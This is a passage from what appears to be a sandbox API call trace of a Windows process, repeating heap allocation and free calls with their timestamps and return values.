[0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.995] GetProcessHeap () returned 0x280000 [0057.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.995] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.996] GetProcessHeap () returned 0x280000 [0057.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.997] GetProcessHeap () returned 0x280000 [0057.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.997] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.998] GetProcessHeap () returned 0x280000 [0057.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.999] GetProcessHeap () returned 0x280000 [0057.999] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.000] GetProcessHeap () returned 0x280000 [0058.000] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.001] GetProcessHeap () returned 0x280000 [0058.001] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.002] GetProcessHeap () returned 0x280000 [0058.002] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.003] GetProcessHeap () returned 0x280000 [0058.003] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.004] GetProcessHeap () returned 0x280000 